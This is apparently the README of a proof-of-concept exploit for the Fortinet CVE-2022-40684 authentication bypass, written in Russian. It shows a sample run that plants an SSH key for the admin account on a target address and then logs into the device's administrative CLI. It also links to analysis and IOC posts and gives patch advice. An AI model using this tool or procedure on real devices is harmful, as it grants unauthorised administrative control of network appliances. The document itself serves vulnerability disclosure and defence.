
Эксплоит PoC для CVE-2022-40684, затрагивающий Fortinet FortiOS, FortiProxy и FortiSwitchManager.
POC для CVE-2022-40684, затрагивающего устройства Fortinet FortiOS, FortiProxy и FortiSwitchManager.
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Для анализа логов Fortinet на предмет индикаторов компрометации и включения более глубокого логирования посмотрите наш блог по IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Этот POC использует уязвимость обхода аутентификации для установки SSH-ключа для указанного пользователя.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Обновите до последней версии или примените меры, следуя инструкциям в Fortinet PSIRT
Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты, и не предназначено для использования для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.